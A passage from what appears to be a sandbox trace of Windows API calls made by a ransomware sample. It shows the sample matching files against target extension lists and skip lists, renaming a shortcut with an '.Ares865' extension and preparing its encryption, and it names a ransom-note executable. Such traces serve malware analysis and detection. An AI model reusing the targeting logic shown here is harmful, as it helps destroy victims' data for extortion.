lpString2="fmp") returned 1 [0068.379] lstrlenW (lpString="fmp12") returned 5 [0068.379] lstrcmpiW (lpString1="r.lnk", lpString2="fmp12") returned 1 [0068.379] lstrlenW (lpString="fmpsl") returned 5 [0068.379] lstrcmpiW (lpString1="r.lnk", lpString2="fmpsl") returned 1 [0068.379] lstrlenW (lpString="fol") returned 3 [0068.379] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0068.379] lstrlenW (lpString="fp3") returned 3 [0068.379] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0068.379] lstrlenW (lpString="fp4") returned 3 [0068.379] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0068.379] lstrlenW (lpString="fp5") returned 3 [0068.379] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0068.379] lstrlenW (lpString="fp7") returned 3 [0068.379] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0068.379] lstrlenW (lpString="fpt") returned 3 [0068.379] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0068.379] lstrlenW (lpString="frm") returned 3 [0068.379] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0068.379] lstrlenW (lpString="gdb") returned 3 [0068.379] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0068.379] lstrlenW (lpString="gdb") returned 3 [0068.379] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0068.379] lstrlenW (lpString="grdb") returned 4 [0068.379] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0068.379] lstrlenW (lpString="gwi") returned 3 [0068.379] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0068.379] lstrlenW (lpString="hdb") returned 3 [0068.379] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0068.379] lstrlenW (lpString="his") returned 3 [0068.379] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0068.379] lstrlenW (lpString="ib") returned 2 [0068.379] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0068.379] lstrlenW (lpString="idb") returned 3 [0068.379] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0068.379] lstrlenW (lpString="ihx") returned 3 [0068.379] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0068.379] lstrlenW (lpString="itdb") returned 4 [0068.379] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0068.380] lstrlenW (lpString="itw") returned 3 [0068.380] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0068.380] lstrlenW (lpString="jet") returned 3 [0068.380] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0068.380] lstrlenW (lpString="jtx") returned 3 [0068.380] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0068.380] lstrlenW (lpString="kdb") returned 3 [0068.380] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0068.380] lstrlenW (lpString="kexi") returned 4 [0068.380] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0068.380] lstrlenW (lpString="kexic") returned 5 [0068.380] lstrcmpiW (lpString1="r.lnk", lpString2="kexic") returned 1 [0068.380] lstrlenW (lpString="kexis") returned 5 [0068.380] lstrcmpiW (lpString1="r.lnk", lpString2="kexis") returned 1 [0068.380] lstrlenW (lpString="lgc") returned 3 [0068.380] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0068.380] lstrlenW (lpString="lwx") returned 3 [0068.380] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0068.380] lstrlenW (lpString="maf") returned 3 [0068.380] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0068.380] lstrlenW (lpString="maq") returned 3 [0068.380] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0068.380] lstrlenW (lpString="mar") returned 3 [0068.380] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0068.380] lstrlenW (lpString="marshal") returned 7 [0068.380] lstrcmpiW (lpString1="ter.lnk", lpString2="marshal") returned 1 [0068.380] lstrlenW (lpString="mas") returned 3 [0068.380] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0068.380] lstrlenW (lpString="mav") returned 3 [0068.380] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0068.380] lstrlenW (lpString="maw") returned 3 [0068.380] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0068.380] lstrlenW (lpString="mdbhtml") returned 7 [0068.380] lstrcmpiW (lpString1="ter.lnk", lpString2="mdbhtml") returned 1 [0068.380] lstrlenW (lpString="mdn") returned 3 [0068.380] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0068.380] lstrlenW (lpString="mdt") returned 3 [0068.380] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0068.380] lstrlenW (lpString="mfd") returned 3 [0068.381] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0068.381] lstrlenW (lpString="mpd") returned 3 [0068.381] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0068.381] lstrlenW (lpString="mrg") returned 3 [0068.381] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0068.381] lstrlenW (lpString="mud") returned 3 [0068.381] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0068.381] lstrlenW (lpString="mwb") returned 3 [0068.381] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0068.381] lstrlenW (lpString="myd") returned 3 [0068.381] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0068.381] lstrlenW (lpString="ndf") returned 3 [0068.381] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0068.381] lstrlenW (lpString="nnt") returned 3 [0068.381] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0068.381] lstrlenW (lpString="nrmlib") returned 6 [0068.381] lstrcmpiW (lpString1="er.lnk", lpString2="nrmlib") returned -1 [0068.381] lstrlenW (lpString="ns2") returned 3 [0068.381] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0068.381] lstrlenW (lpString="ns3") returned 3 [0068.381] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0068.381] lstrlenW (lpString="ns4") returned 3 [0068.381] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0068.381] lstrlenW (lpString="nsf") returned 3 [0068.381] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0068.381] lstrlenW (lpString="nv") returned 2 [0068.381] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0068.381] lstrlenW (lpString="nv2") returned 3 [0068.381] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0068.381] lstrlenW (lpString="nwdb") returned 4 [0068.381] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0068.381] lstrlenW (lpString="nyf") returned 3 [0068.381] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0068.381] lstrlenW (lpString="odb") returned 3 [0068.381] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0068.381] lstrlenW (lpString="odb") returned 3 [0068.381] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0068.381] lstrlenW (lpString="oqy") returned 3 [0068.382] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0068.382] lstrlenW (lpString="ora") returned 3 [0068.382] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0068.382] lstrlenW (lpString="orx") returned 3 [0068.382] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0068.382] lstrlenW (lpString="owc") returned 3 [0068.382] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0068.382] lstrlenW (lpString="p96") returned 3 [0068.382] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0068.382] lstrlenW (lpString="p97") returned 3 [0068.382] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0068.382] lstrlenW (lpString="pan") returned 3 [0068.382] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0068.382] lstrlenW (lpString="pdb") returned 3 [0068.382] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0068.382] lstrlenW (lpString="pdm") returned 3 [0068.382] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0068.382] lstrlenW (lpString="pnz") returned 3 [0068.382] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0068.382] lstrlenW (lpString="qry") returned 3 [0068.382] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0068.382] lstrlenW (lpString="qvd") returned 3 [0068.382] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0068.382] lstrlenW (lpString="rbf") returned 3 [0068.382] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0068.382] lstrlenW (lpString="rctd") returned 4 [0068.382] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0068.382] lstrlenW (lpString="rod") returned 3 [0068.382] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0068.382] lstrlenW (lpString="rodx") returned 4 [0068.382] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0068.382] lstrlenW (lpString="rpd") returned 3 [0068.382] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0068.382] lstrlenW (lpString="rsd") returned 3 [0068.382] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0068.382] lstrlenW (lpString="sas7bdat") returned 8 [0068.382] lstrcmpiW (lpString1="nter.lnk", lpString2="sas7bdat") returned -1 [0068.382] lstrlenW (lpString="sbf") returned 3 [0068.383] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0068.383] lstrlenW (lpString="scx") returned 3 [0068.383] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0068.383] lstrlenW (lpString="sdb") returned 3 [0068.383] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0068.383] lstrlenW (lpString="sdc") returned 3 [0068.383] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0068.383] lstrlenW (lpString="sdf") returned 3 [0068.383] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0068.383] lstrlenW (lpString="sis") returned 3 [0068.383] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0068.383] lstrlenW (lpString="spq") returned 3 [0068.383] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0068.383] lstrlenW (lpString="te") returned 2 [0068.383] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0068.383] lstrlenW (lpString="teacher") returned 7 [0068.383] lstrcmpiW (lpString1="ter.lnk", lpString2="teacher") returned 1 [0068.383] lstrlenW (lpString="tmd") returned 3 [0068.383] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0068.383] lstrlenW (lpString="tps") returned 3 [0068.383] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0068.383] lstrlenW (lpString="trc") returned 3 [0068.383] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0068.383] lstrlenW (lpString="trc") returned 3 [0068.383] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0068.383] lstrlenW (lpString="trm") returned 3 [0068.383] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0068.383] lstrlenW (lpString="udb") returned 3 [0068.383] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0068.383] lstrlenW (lpString="udl") returned 3 [0068.383] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0068.383] lstrlenW (lpString="usr") returned 3 [0068.383] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0068.383] lstrlenW (lpString="v12") returned 3 [0068.383] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0068.383] lstrlenW (lpString="vis") returned 3 [0068.383] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0068.383] lstrlenW (lpString="vpd") returned 3 [0068.383] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0068.384] lstrlenW (lpString="vvv") returned 3 [0068.384] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0068.384] lstrlenW (lpString="wdb") returned 3 [0068.384] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0068.384] lstrlenW (lpString="wmdb") returned 4 [0068.384] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0068.384] lstrlenW (lpString="wrk") returned 3 [0068.384] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0068.384] lstrlenW (lpString="xdb") returned 3 [0068.384] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0068.384] lstrlenW (lpString="xld") returned 3 [0068.384] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0068.384] lstrlenW (lpString="xmlff") returned 5 [0068.384] lstrcmpiW (lpString1="r.lnk", lpString2="xmlff") returned -1 [0068.384] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Welcome Center.lnk.Ares865") returned 77 [0068.384] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Welcome Center.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\welcome center.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Welcome Center.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\welcome center.lnk.ares865"), dwFlags=0x1) returned 1 [0068.385] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Welcome Center.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\welcome center.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0068.385] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1579) returned 1 [0068.385] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0068.385] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0068.385] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0068.385] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0068.386] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.386] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0068.386] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x930, lpName=0x0) returned 0x120 [0068.386] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x930) returned 0x190000 [0068.387] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0068.387] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.387] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0068.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0068.387] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0068.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0068.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0068.387] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0068.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0068.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0068.388] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0068.388] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0068.388] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0068.388] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0068.388] CloseHandle (hObject=0x120) returned 1 [0068.388] CloseHandle (hObject=0x154) returned 1 [0068.389] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0068.389] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0068.389] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0068.390] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4bbcba20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bbcba20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows PowerShell", cAlternateFileName="WINDOW~1")) returned 1 [0068.390] lstrcmpiW (lpString1="Windows PowerShell", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0068.390] lstrcmpiW (lpString1="Windows PowerShell", lpString2="aoldtz.exe") returned 1 [0068.390] lstrcmpiW (lpString1="Windows PowerShell", lpString2=".") returned 1 [0068.390] lstrcmpiW (lpString1="Windows PowerShell", lpString2="..") returned 1 [0068.390] lstrcmpiW (lpString1="Windows PowerShell", lpString2="windows") returned 1 [0068.390] lstrcmpiW (lpString1="Windows PowerShell", lpString2="bootmgr") returned 1 [0068.390] lstrcmpiW (lpString1="Windows PowerShell", lpString2="temp") returned 1 [0068.390] lstrcmpiW (lpString1="Windows PowerShell", lpString2="pagefile.sys") returned 1 [0068.390] lstrcmpiW (lpString1="Windows PowerShell", lpString2="boot") returned 1 [0068.390] lstrcmpiW (lpString1="Windows PowerShell", lpString2="ids.txt") returned 1 [0068.390] lstrcmpiW (lpString1="Windows PowerShell", lpString2="ntuser.dat") returned 1 [0068.390] lstrcmpiW (lpString1="Windows PowerShell", lpString2="perflogs") returned 1 [0068.390] lstrcmpiW (lpString1="Windows PowerShell", lpString2="MSBuild") returned 1 [0068.390] lstrlenW (lpString="Windows PowerShell") returned 18 [0068.390] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Welcome Center.lnk") returned 69 [0068.390] lstrcpyW (in: lpString1=0x2cce466, lpString2="Windows PowerShell" | out: lpString1="Windows PowerShell") returned="Windows PowerShell" [0068.390] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0068.390] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8c) returned 0x2cfda8 [0068.390] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7b90 [0068.391] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d25b9f8, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x3d25b9f8, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x3d2cde19, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x52a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wordpad.lnk", cAlternateFileName="")) returned 1 [0068.391] lstrcmpiW (lpString1="Wordpad.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0068.391] lstrcmpiW (lpString1="Wordpad.lnk", lpString2="aoldtz.exe") returned 1 [0068.391] lstrcmpiW (lpString1="Wordpad.lnk", lpString2=".") returned 1 [0068.391] lstrcmpiW (lpString1="Wordpad.lnk", lpString2="..") returned 1 [0068.391] lstrcmpiW (lpString1="Wordpad.lnk", lpString2="windows") returned 1 [0068.391] lstrcmpiW (lpString1="Wordpad.lnk", lpString2="bootmgr") returned 1 [0068.391] lstrcmpiW (lpString1="Wordpad.lnk", lpString2="temp") returned 1 [0068.391] lstrcmpiW (lpString1="Wordpad.lnk", lpString2="pagefile.sys") returned 1 [0068.391] lstrcmpiW (lpString1="Wordpad.lnk", lpString2="boot") returned 1 [0068.391] lstrcmpiW (lpString1="Wordpad.lnk", lpString2="ids.txt") returned 1 [0068.391] lstrcmpiW (lpString1="Wordpad.lnk", lpString2="ntuser.dat") returned 1 [0068.391] lstrcmpiW (lpString1="Wordpad.lnk", lpString2="perflogs") returned 1 [0068.391] lstrcmpiW (lpString1="Wordpad.lnk", lpString2="MSBuild") returned 1 [0068.391] lstrlenW (lpString="Wordpad.lnk") returned 11 [0068.391] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell") returned 69 [0068.391] lstrcpyW (in: lpString1=0x2cce466, lpString2="Wordpad.lnk" | out: lpString1="Wordpad.lnk") returned="Wordpad.lnk" [0068.391] lstrlenW (lpString="Wordpad.lnk") returned 11 [0068.391] lstrlenW (lpString="Ares865") returned 7 [0068.391] lstrcmpiW (lpString1="pad.lnk", lpString2="Ares865") returned 1 [0068.391] lstrlenW (lpString=".dll") returned 4 [0068.391] lstrcmpiW (lpString1="Wordpad.lnk", lpString2=".dll") returned 1 [0068.391] lstrlenW (lpString=".lnk") returned 4 [0068.391] lstrcmpiW (lpString1="Wordpad.lnk", lpString2=".lnk") returned 1 [0068.391] lstrlenW (lpString=".ini") returned 4 [0068.391] lstrcmpiW (lpString1="Wordpad.lnk", lpString2=".ini") returned 1 [0068.391] lstrlenW (lpString=".sys") returned 4 [0068.391] lstrcmpiW (lpString1="Wordpad.lnk", lpString2=".sys") returned 1 [0068.391] lstrlenW (lpString="Wordpad.lnk") returned 11 [0068.391] lstrlenW (lpString="bak") returned 3 [0068.391] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0068.391] lstrlenW (lpString="ba_") returned 3 [0068.391] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0068.391] lstrlenW (lpString="dbb") returned 3 [0068.391] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0068.391] lstrlenW (lpString="vmdk") returned 4 [0068.391] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0068.391] lstrlenW (lpString="rar") returned 3 [0068.392] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0068.392] lstrlenW (lpString="zip") returned 3 [0068.392] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0068.392] lstrlenW (lpString="tgz") returned 3 [0068.392] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0068.392] lstrlenW (lpString="vbox") returned 4 [0068.392] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0068.392] lstrlenW (lpString="vdi") returned 3 [0068.392] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0068.392] lstrlenW (lpString="vhd") returned 3 [0068.392] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0068.392] lstrlenW (lpString="vhdx") returned 4 [0068.392] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0068.392] lstrlenW (lpString="avhd") returned 4 [0068.392] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0068.392] lstrlenW (lpString="db") returned 2 [0068.392] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0068.392] lstrlenW (lpString="db2") returned 3 [0068.392] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0068.392] lstrlenW (lpString="db3") returned 3 [0068.392] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0068.392] lstrlenW (lpString="dbf") returned 3 [0068.392] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0068.392] lstrlenW (lpString="mdf") returned 3 [0068.392] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0068.392] lstrlenW (lpString="mdb") returned 3 [0068.392] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0068.392] lstrlenW (lpString="sql") returned 3 [0068.392] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0068.392] lstrlenW (lpString="sqlite") returned 6 [0068.392] lstrcmpiW (lpString1="ad.lnk", lpString2="sqlite") returned -1 [0068.392] lstrlenW (lpString="sqlite3") returned 7 [0068.392] lstrcmpiW (lpString1="pad.lnk", lpString2="sqlite3") returned -1 [0068.392] lstrlenW (lpString="sqlitedb") returned 8 [0068.392] lstrcmpiW (lpString1="dpad.lnk", lpString2="sqlitedb") returned -1 [0068.392] lstrlenW (lpString="xml") returned 3 [0068.392] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0068.392] lstrlenW (lpString="$er") returned 3 [0068.393] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0068.393] lstrlenW (lpString="4dd") returned 3 [0068.393] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0068.393] lstrlenW (lpString="4dl") returned 3 [0068.393] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0068.393] lstrlenW (lpString="^^^") returned 3 [0068.393] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0068.393] lstrlenW (lpString="abs") returned 3 [0068.393] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0068.393] lstrlenW (lpString="abx") returned 3 [0068.393] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0068.393] lstrlenW (lpString="accdb") returned 5 [0068.393] lstrcmpiW (lpString1="d.lnk", lpString2="accdb") returned 1 [0068.393] lstrlenW (lpString="accdc") returned 5 [0068.393] lstrcmpiW (lpString1="d.lnk", lpString2="accdc") returned 1 [0068.393] lstrlenW (lpString="accde") returned 5 [0068.393] lstrcmpiW (lpString1="d.lnk", lpString2="accde") returned 1 [0068.393] lstrlenW (lpString="accdr") returned 5 [0068.393] lstrcmpiW (lpString1="d.lnk", lpString2="accdr") returned 1 [0068.393] lstrlenW (lpString="accdt") returned 5 [0068.393] lstrcmpiW (lpString1="d.lnk", lpString2="accdt") returned 1 [0068.393] lstrlenW (lpString="accdw") returned 5 [0068.393] lstrcmpiW (lpString1="d.lnk", lpString2="accdw") returned 1 [0068.393] lstrlenW (lpString="accft") returned 5 [0068.393] lstrcmpiW (lpString1="d.lnk", lpString2="accft") returned 1 [0068.393] lstrlenW (lpString="adb") returned 3 [0068.393] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0068.393] lstrlenW (lpString="adb") returned 3 [0068.393] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0068.393] lstrlenW (lpString="ade") returned 3 [0068.393] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0068.393] lstrlenW (lpString="adf") returned 3 [0068.393] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0068.393] lstrlenW (lpString="adn") returned 3 [0068.393] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0068.393] lstrlenW (lpString="adp") returned 3 [0068.393] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0068.393] lstrlenW (lpString="alf") returned 3 [0068.393] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0068.394] lstrlenW (lpString="ask") returned 3 [0068.394] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0068.394] lstrlenW (lpString="btr") returned 3 [0068.394] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0068.394] lstrlenW (lpString="cat") returned 3 [0068.394] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0068.394] lstrlenW (lpString="cdb") returned 3 [0068.394] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0068.394] lstrlenW (lpString="ckp") returned 3 [0068.394] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0068.394] lstrlenW (lpString="cma") returned 3 [0068.394] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0068.394] lstrlenW (lpString="cpd") returned 3 [0068.394] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0068.394] lstrlenW (lpString="dacpac") returned 6 [0068.394] lstrcmpiW (lpString1="ad.lnk", lpString2="dacpac") returned -1 [0068.394] lstrlenW (lpString="dad") returned 3 [0068.394] lstrcmpiW (lpString1="lnk", 